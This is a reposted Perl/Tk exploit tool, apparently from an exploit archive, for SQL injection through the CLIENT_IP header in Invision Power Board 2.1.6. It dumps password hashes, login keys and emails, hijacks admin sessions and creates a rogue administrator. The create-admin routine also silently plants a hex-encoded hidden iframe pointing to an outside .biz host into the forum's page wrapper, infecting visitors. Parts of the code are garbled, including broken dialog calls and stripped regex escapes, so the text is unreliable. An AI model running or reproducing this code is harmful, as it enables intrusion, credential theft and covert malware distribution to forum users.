Invision Power Board 2.1.6 |SQL Injection|

[Screech]

Exploit:

#!/usr/bin/perl

## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC

## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41

## http://rst.void.ru/papers/advisory41.txt

## tested on 2.1.3, 2.1.6

##

## 08.06.06

## ©oded by 1dt.w0lf

## RST/GHC

## http://rst.void.ru

## http://ghc.ru

use Tk;

use Tk::BrowseEntry;

use Tk::DialogBox;

use LWP::UserAgent;

$mw = new MainWindow(title => "r57ipb216gui" );

$mw->geometry ( '420x550' ) ;

$mw->resizable(0,0);

$mw->Label(-text => '!', -font => '{Webdings} 22')->pack();

$mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();

$mw->Label(-text => '')->pack();

$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;

$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;

$url = 'http://server/forum/index.php';

$user_id = '1';

$prefix = 'ibf_';

$table = 'members';

$column = 'member_login_key';

$new_admin_name = 'rstghc';

$new_admin_password = 'rstghc';

$new_admin_email = 'billy@microsoft.com';

$report = '';

$group = 4;

$curr_user = 0;

$rand_session = &session();

$use_custom_fields = 0;

$custom_fields = 'name1=value1,name2=value2';

$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $url) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fright->Label( -text => ' ')->pack();

$fleft->Label( -text => ' ')->pack();

$fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Label( -text => ' ')->pack();

$fleft->Label ( -text => 'Get data from table: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$b2 = $fright->BrowseEntry( -command => &update_columns, -relief => "groove", -variable => $table, -font => '{Verdana} 8');

$b2->insert("end", "members");

$b2->insert("end", "members_converge");

$b2->pack( -side => "top" , -anchor => 'w');

$fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$b = $fright->BrowseEntry( -relief => "groove", -variable => $column, -font => '{Verdana} 8');

$b->insert("end", "member_login_key");

$b->insert("end", "name");

$b->insert("end", "ip_address");

$b->insert("end", "legacy_password");

$b->insert("end", "email");

$b->pack( -side => "top" , -anchor => 'w' );

$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $report) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'create new admin', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Label( -text => ' ')->pack();

$fleft->Label ( -text => ' ')->pack();

$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => $curr_user)->pack(-side => "top" , -anchor => 'w');

$fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $session_id) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'session_ip_address: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $session_ip_address) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new admin name: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_name) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new admin password: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_password) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_email) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => ' ')->pack();

$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => $use_custom_fields)->pack(-side => "top" , -anchor => 'w');

$fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $custom_fields) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fright->Label( -text => ' ')->pack();

$fright->Button(-text => 'Test forum vulnerability',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &test_vuln

)->pack();

$fright->Button(-text => 'Get database tables prefix',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &get_prefix

)->pack();

$fright->Button(-text => 'Get data from database',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &get_data

)->pack();

$fright->Button(-text => 'Get admin session',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &get_admin

)->pack();

$fright->Button(-text => 'Create new admin',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &create_admin

)->pack();

$fleft->Label( -text => ' ')->pack();

$fleft->Label( -text => ' ')->pack();

$fleft->Label( -text => ' ')->pack();

$fleft->Label( -text => '©oded by 1dt.w0lf', -font => '{Verdana} 7')->pack();

$fleft->Label( -text => 'RST/GHC', -font => '{Verdana} 7')->pack();

$fleft->Label( -text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack();

$fleft->Label( -text => 'http://ghc.ru', -font => '{Verdana} 7')->pack();

MainLoop();

sub update_columns()

{

$b->delete(0,"end");

if($table eq 'members'){

$column = "member_login_key";

$b->insert("end", "member_login_key");

$b->insert("end", "name");

$b->insert("end", "ip_address");

$b->insert("end", "legacy_password");

$b->insert("end", "email");

} elsif($table eq 'members_converge'){

$column = "converge_pass_hash";

$b->insert("end", "converge_pass_hash");

$b->insert("end", "converge_pass_salt");

$b->insert("end", "converge_email");

}

}

sub get_admin()

{

$xpl = LWP::UserAgent->new( ) or die;

$InfoWindow=$mw->DialogBox(-title => 'get admin session', -buttons => ["OK wrote: );

if($curr_user == 1) { $sql = "AND session_member_id = $user_id"; }

else { $sql = ''; }

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*");

$error = 0;

$rep = '';

if($res->is_success)

{

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; }

if($rep =~ /d{1,3}.d{1,3}.d{1,3}.d{1,3}/) { $session_ip_address = $rep; }

else { $error = 1; }

if(!$error)

{

$rep = '';

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*");

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; $session_id = $rep; }

else { $error = 1; }

if(!$error){

if($curr_user != 1)

{

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*");

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $session_user_id = $3; }

}

else

{

$session_user_id = $user_id;

}

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $group = $3; }

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $name = $3; }

}

$InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold',-foreground=>'Green')->pack;

$InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

}

else

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

if($error)

{

$InfoWindow->add('Label', -text => 'Can't get admin session.', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

}

sub get_data()

{

$xpl = LWP::UserAgent->new( ) or die;

$InfoWindow=$mw->DialogBox(-title => 'get data from database', -buttons => ["OK wrote: );

if($table eq 'members') { $id_text = 'id'; }

if($table eq 'members_converge') { $id_text = 'converge_id'; }

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." WHERE ".$id_text."=".$user_id."/*");

if($res->is_success)

{

$rep = '';

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/){ $report = $3; }

else

{

$InfoWindow->add('Label', -text => 'Can't get data from database', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

}

else

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

}

sub create_admin()

{

$InfoWindow=$mw->DialogBox(-title => 'create new admin', -buttons => ["OK wrote: );

if($session_id eq '' || $session_ip_address eq '')

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack;

}

elsif($session_ip_address !~ /d{1,3}.d{1,3}.d{1,3}.d{1,3}/)

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack;

}

else

{

$xpl = LWP::UserAgent->new( ) or die;

($url2 = $url) =~ s/index.php/admin.php/;

$cf = '';

%fields = (

'code' => 'doadd',

'act' => 'mem',

'section' => 'content',

'name' => $new_admin_name,

'password' => $new_admin_password,

'email' => $new_admin_email,

'mgroup' => $group,

);

if($use_custom_fields)

{

@cf = split(',',$custom_fields);

foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;}

}

$res = $xpl->post($url2."?adsess=$session_id",

[

%fields,

],

'USER_AGENT'=>'',

'CLIENT_IP'=>"$session_ip_address",

'X_FORWARDED_FOR'=>"$session_ip_address");

$if = '0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E';

$query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")";

$res = $xpl->post($url2."?adsess=$session_id",

[

'code' => 'runsql',

'act' => 'sql',

'section' => 'admin',

'query' => $query,

],

'USER_AGENT'=>'',

'CLIENT_IP'=>"$session_ip_address",

'X_FORWARDED_FOR'=>"$session_ip_address");

$InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack;

$InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack;

}

$InfoWindow->Show();

$InfoWindow->destroy;

}

sub test_vuln()

{

$InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK wrote: );

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

$xpl = LWP::UserAgent->new( ) or die;

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/*");

if($res->is_success)

{

$rep = '';

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; }

if($rep eq 'VULN') { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }

else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; }

}

else

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;

}

$InfoWindow->Show();

$InfoWindow->destroy;

}

sub get_prefix()

{

$InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK wrote: );

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

$xpl = LWP::UserAgent->new( ) or die;

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'");

if($res->is_success)

{

$rep = '';

if($res->as_string =~ /FROM (.*)sessions/)

{

$prefix = $1;

$InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack;

}

else

{

$InfoWindow->add('Label', -text => 'Can't get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }

}

else

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;

}

$InfoWindow->Show();

$InfoWindow->destroy;

}

sub session()

{

return 'r57ipb216_for_IDS';

}

# milw0rm.com [2006-07-14][/list:u]

Search: Invision Power Board v2.1.6